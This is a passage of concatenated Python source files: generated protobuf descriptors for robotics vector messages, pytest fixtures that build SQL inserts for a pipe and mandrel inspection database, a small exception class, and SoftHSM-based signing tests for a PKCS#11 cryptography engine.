serialized_pb=b'\n\x0cvector.proto\x12\x11robotics.messages\"6\n\x08Vector4d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\x12\t\n\x01w\x18\x04 \x01(\x01\"6\n\x08Vector4f\x12\t\n\x01x\x18\x01 \x01(\x02\x12\t\n\x01y\x18\x02 \x01(\x02\x12\t\n\x01z\x18\x03 \x01(\x02\x12\t\n\x01w\x18\x04 \x01(\x02\"6\n\x08Vector4i\x12\t\n\x01x\x18\x01 \x01(\x03\x12\t\n\x01y\x18\x02 \x01(\x03\x12\t\n\x01z\x18\x03 \x01(\x03\x12\t\n\x01w\x18\x04 \x01(\x03\"+\n\x08Vector3d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\"+\n\x08Vector3f\x12\t\n\x01x\x18\x01 \x01(\x02\x12\t\n\x01y\x18\x02 \x01(\x02\x12\t\n\x01z\x18\x03 \x01(\x02\"+\n\x08Vector3i\x12\t\n\x01x\x18\x01 \x01(\x03\x12\t\n\x01y\x18\x02 \x01(\x03\x12\t\n\x01z\x18\x03 \x01(\x03\" \n\x08Vector2d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\" \n\x08Vector2f\x12\t\n\x01x\x18\x01 \x01(\x02\x12\t\n\x01y\x18\x02 \x01(\x02\" \n\x08Vector2i\x12\t\n\x01x\x18\x01 \x01(\x03\x12\t\n\x01y\x18\x02 \x01(\x03\"\x1b\n\x07Vectord\x12\x10\n\x04\x64\x61ta\x18\x01 \x03(\x01\x42\x02\x10\x01\"\x1b\n\x07Vectorf\x12\x10\n\x04\x64\x61ta\x18\x01 \x03(\x02\x42\x02\x10\x01\"\x1b\n\x07Vectori\x12\x10\n\x04\x64\x61ta\x18\x01 \x03(\x03\x42\x02\x10\x01\x42\x03\xf8\x01\x01\x62\x06proto3'
)
_VECTOR4D = _descriptor.Descriptor(
name='Vector4d',
full_name='robotics.messages.Vector4d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector4d.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector4d.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector4d.z', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='w', full_name='robotics.messages.Vector4d.w', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=35,
serialized_end=89,
)
_VECTOR4F = _descriptor.Descriptor(
name='Vector4f',
full_name='robotics.messages.Vector4f',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector4f.x', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector4f.y', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector4f.z', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='w', full_name='robotics.messages.Vector4f.w', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=91,
serialized_end=145,
)
_VECTOR4I = _descriptor.Descriptor(
name='Vector4i',
full_name='robotics.messages.Vector4i',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector4i.x', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector4i.y', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector4i.z', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='w', full_name='robotics.messages.Vector4i.w', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=147,
serialized_end=201,
)
_VECTOR3D = _descriptor.Descriptor(
name='Vector3d',
full_name='robotics.messages.Vector3d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector3d.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector3d.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector3d.z', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=203,
serialized_end=246,
)
_VECTOR3F = _descriptor.Descriptor(
name='Vector3f',
full_name='robotics.messages.Vector3f',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector3f.x', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector3f.y', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector3f.z', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=248,
serialized_end=291,
)
_VECTOR3I = _descriptor.Descriptor(
name='Vector3i',
full_name='robotics.messages.Vector3i',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector3i.x', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector3i.y', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector3i.z', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=293,
serialized_end=336,
)
_VECTOR2D = _descriptor.Descriptor(
name='Vector2d',
full_name='robotics.messages.Vector2d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector2d.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector2d.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=338,
serialized_end=370,
)
_VECTOR2F = _descriptor.Descriptor(
name='Vector2f',
full_name='robotics.messages.Vector2f',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector2f.x', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector2f.y', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=372,
serialized_end=404,
)
_VECTOR2I = _descriptor.Descriptor(
name='Vector2i',
full_name='robotics.messages.Vector2i',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector2i.x', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector2i.y', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=406,
serialized_end=438,
)
_VECTORD = _descriptor.Descriptor(
name='Vectord',
full_name='robotics.messages.Vectord',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='data', full_name='robotics.messages.Vectord.data', index=0,
number=1, type=1, cpp_type=5, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\020\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=440,
serialized_end=467,
)
_VECTORF = _descriptor.Descriptor(
name='Vectorf',
full_name='robotics.messages.Vectorf',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='data', full_name='robotics.messages.Vectorf.data', index=0,
number=1, type=2, cpp_type=6, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\020\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=469,
serialized_end=496,
)
_VECTORI = _descriptor.Descriptor(
name='Vectori',
full_name='robotics.messages.Vectori',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='data', full_name='robotics.messages.Vectori.data', index=0,
number=1, type=3, cpp_type=2, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\020\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=498,
serialized_end=525,
)
DESCRIPTOR.message_types_by_name['Vector4d'] = _VECTOR4D
DESCRIPTOR.message_types_by_name['Vector4f'] = _VECTOR4F
DESCRIPTOR.message_types_by_name['Vector4i'] = _VECTOR4I
DESCRIPTOR.message_types_by_name['Vector3d'] = _VECTOR3D
DESCRIPTOR.message_types_by_name['Vector3f'] = _VECTOR3F
DESCRIPTOR.message_types_by_name['Vector3i'] = _VECTOR3I
DESCRIPTOR.message_types_by_name['Vector2d'] = _VECTOR2D
DESCRIPTOR.message_types_by_name['Vector2f'] = _VECTOR2F
DESCRIPTOR.message_types_by_name['Vector2i'] = _VECTOR2I
DESCRIPTOR.message_types_by_name['Vectord'] = _VECTORD
DESCRIPTOR.message_types_by_name['Vectorf'] = _VECTORF
DESCRIPTOR.message_types_by_name['Vectori'] = _VECTORI
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Vector4d = _reflection.GeneratedProtocolMessageType('Vector4d', (_message.Message,), {
'DESCRIPTOR' : _VECTOR4D,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector4d)
})
_sym_db.RegisterMessage(Vector4d)
Vector4f = _reflection.GeneratedProtocolMessageType('Vector4f', (_message.Message,), {
'DESCRIPTOR' : _VECTOR4F,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector4f)
})
_sym_db.RegisterMessage(Vector4f)
Vector4i = _reflection.GeneratedProtocolMessageType('Vector4i', (_message.Message,), {
'DESCRIPTOR' : _VECTOR4I,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector4i)
})
_sym_db.RegisterMessage(Vector4i)
Vector3d = _reflection.GeneratedProtocolMessageType('Vector3d', (_message.Message,), {
'DESCRIPTOR' : _VECTOR3D,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector3d)
})
_sym_db.RegisterMessage(Vector3d)
Vector3f = _reflection.GeneratedProtocolMessageType('Vector3f', (_message.Message,), {
'DESCRIPTOR' : _VECTOR3F,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector3f)
})
_sym_db.RegisterMessage(Vector3f)
Vector3i = _reflection.GeneratedProtocolMessageType('Vector3i', (_message.Message,), {
'DESCRIPTOR' : _VECTOR3I,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector3i)
})
_sym_db.RegisterMessage(Vector3i)
Vector2d = _reflection.GeneratedProtocolMessageType('Vector2d', (_message.Message,), {
'DESCRIPTOR' : _VECTOR2D,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector2d)
})
_sym_db.RegisterMessage(Vector2d)
Vector2f = _reflection.GeneratedProtocolMessageType('Vector2f', (_message.Message,), {
'DESCRIPTOR' : _VECTOR2F,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector2f)
})
_sym_db.RegisterMessage(Vector2f)
Vector2i = _reflection.GeneratedProtocolMessageType('Vector2i', (_message.Message,), {
'DESCRIPTOR' : _VECTOR2I,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector2i)
})
_sym_db.RegisterMessage(Vector2i)
Vectord = _reflection.GeneratedProtocolMessageType('Vectord', (_message.Message,), {
'DESCRIPTOR' : _VECTORD,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vectord)
})
_sym_db.RegisterMessage(Vectord)
Vectorf = _reflection.GeneratedProtocolMessageType('Vectorf', (_message.Message,), {
'DESCRIPTOR' : _VECTORF,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vectorf)
})
_sym_db.RegisterMessage(Vectorf)
Vectori = _reflection.GeneratedProtocolMessageType('Vectori', (_message.Message,), {
'DESCRIPTOR' : _VECTORI,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vectori)
})
_sym_db.RegisterMessage(Vectori)
DESCRIPTOR._options = None
_VECTORD.fields_by_name['data']._options = None
_VECTORF.fields_by_name['data']._options = None
_VECTORI.fields_by_name['data']._options = None
# @@protoc_insertion_point(module_scope)
# File: winnum_sender_service/tests/conftest.py
# Repo: OlegZhavoronkov/tnk_certification (license: Unlicense)
from datetime import datetime
import psycopg2
import pytest
from sent_to_winnum import WinnumLogger, Config
CFG_PATH = 'config/config.json'
@pytest.fixture(scope='session')
def pg_connect():
conn = None
try:
conn = psycopg2.connect(host=Config.postgresql_host, dbname=Config.dbname, user=Config.user,
password=Config.password)
with conn.cursor() as cursor:
yield cursor
cursor.close()
except psycopg2.DatabaseError as e:
print(e)
finally:
if conn is not None:
conn.close()
@pytest.fixture(scope='session', autouse=True)
def init():
WinnumLogger.init_logger()
WinnumLogger.get_logger()
Config.load(CFG_PATH)
@pytest.fixture
def build_bad_mandrel_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'mandrel'), 13, '{obj_id}');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_bad_pipe_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
        f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'pipe'), 13, '{obj_id}');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_valid_mandrel_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'mandrel'), 13, '{obj_id}');\n"
f"INSERT INTO mandrels(id, object_id, last_detection, diameter, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, TRUE);\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_valid_pipe_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'pipe'), 13, '{obj_id}');\n"
f"INSERT INTO pipes(id, object_id, last_detection, diameter, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, TRUE);\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_defect_pipe_query_with_2_defects():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'pipe'), 13, '{obj_id}');\n"
f"INSERT INTO pipes(id, object_id, last_detection, diameter, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, FALSE);\n"
f"INSERT INTO pipes_defects(id, pipe_id, defect_id, POSITION, SIZE, depth, PRECISION, image_url)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_mandrel_id FROM pipes m), 2, 6273.000000, 470, 7.000000, -1.000000, '/home/vault/picture_arc');\n"
f"INSERT INTO pipes_defects(id, pipe_id, defect_id, POSITION, SIZE, depth, PRECISION, image_url)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_mandrel_id FROM pipes m), 2, 6273.000000, 470, 7.000000, -1.000000, '/home/vault/picture_arc');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_defect_mandrel_query_with_2_defects():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'mandrel'), 13, '{obj_id}');\n"
f"INSERT INTO mandrels(id, object_id, last_detection, diameter, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, FALSE);\n"
f"INSERT INTO mandrels_defects(id, detected_timestamp, mandrel_id, defect_id, POSITION, SIZE, depth, PRECISION, image_url)\n"
f"VALUES (DEFAULT, '2021-08-10 12:14:16.928', (SELECT max(id) AS max_mandrel_id FROM mandrels m), 2, 6273.000000, 470, 7.000000, -1.000000, '/home/vault/picture_arc');\n"
f"INSERT INTO mandrels_defects(id, detected_timestamp, mandrel_id, defect_id, POSITION, SIZE, depth, PRECISION, image_url)\n"
f"VALUES (DEFAULT, '2021-08-10 12:14:16.928', (SELECT max(id) AS max_mandrel_id FROM mandrels m), 2, 6273.000000, 470, 7.000000, -1.000000, '/home/vault/picture_arc');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_valid_billet_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'billet'), 13, '{obj_id}');\n"
f"INSERT INTO billets(id, object_id, last_detection, diameter1, diameter2, diameter3, length, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, 556.000000, 556.000000, 4444234, TRUE);\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_bad_billet_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'billet'), 13, '{obj_id}');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_defect_billet_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'billet'), 13, '{obj_id}');\n"
f"INSERT INTO billets(id, object_id, last_detection, diameter1, diameter2, diameter3, length, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, 556.000000, 556.000000, 4444234, FALSE);\n"
f"COMMIT;\n"
    )
# File: cmp_telegram_pusher/src/exceptions/bad_response_exception.py
# Repo: andrii-z4i/xmind-telegram (license: MIT)
class BadResponseException(Exception):
def __init__(self, reason: str) -> None:
super().__init__(reason, None)
self._reason: str = reason
@property
def reason(self) -> str:
return self._reason
# File: tests/test_engine.py
# Repo: space88man/cryptography_engine (license: MIT)
import os
from cryptography_engine import engine
import subprocess
os.environ["SOFTHSM2_CONF"] = "tests/softhsm2.conf"
os.environ["OPENSSL_CONF"] = "tests/fixtures/openssl.cnf"
PIN = "userpin"
TOKEN = "MyToken1"
RSA_ALIAS = "RSA-0001"
EC_ALIAS = "EC-0003"
test_data = os.environ.get("TEST_ENGINE_DATA", None)
if test_data:
TOKEN, PIN, RSA_ALIAS, EC_ALIAS = test_data.split()
RSA_PKCS11_URL = f"pkcs11:token={TOKEN};object={RSA_ALIAS}"
EC_PKCS11_URL = f"pkcs11:token={TOKEN};object={EC_ALIAS}"
class TestEngine:
def test_engine_load(self):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
engine.engine_finish(e)
def test_rsa_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = b"\x00" * 8192
p = tmp_path / "test_sign_data"
p.write_bytes(data)
for k in ("sha1", "sha256", "sha384", "sha512"):
sig = pkey.sign(
data, engine.engine_padding_pkcs1(), engine.engine_hashes(k)
)
assert len(sig) in (128, 256, 384, 512)
p_sig = tmp_path / "test_sign_sig"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-signature",
f"{p_sig}",
f"{p}",
]
)
assert proc.returncode == 0
pubkey.verify(
sig, data, engine.engine_padding_pkcs1(), engine.engine_hashes(k)
)
engine.engine_finish(e)
def test_pss_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = b"\x00" * 8192
p = tmp_path / "test_pss_sign_data"
p.write_bytes(data)
for k in ("sha256:222", "sha256:96", "sha384:206", "sha512:64"):
k, saltlen = k.split(":")
padding = engine.engine_padding_pss(k, int(saltlen))
sig = pkey.sign(data, padding, engine.engine_hashes(k))
assert len(sig) in (128, 256, 384, 512)
p_sig = tmp_path / "test_pss_sign_sig"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-sigopt",
"rsa_padding_mode:pss",
"-signature",
f"{p_sig}",
f"{p}",
]
)
assert proc.returncode == 0
pubkey.verify(sig, data, padding, engine.engine_hashes(k))
engine.engine_finish(e)
def test_ec_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = EC_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
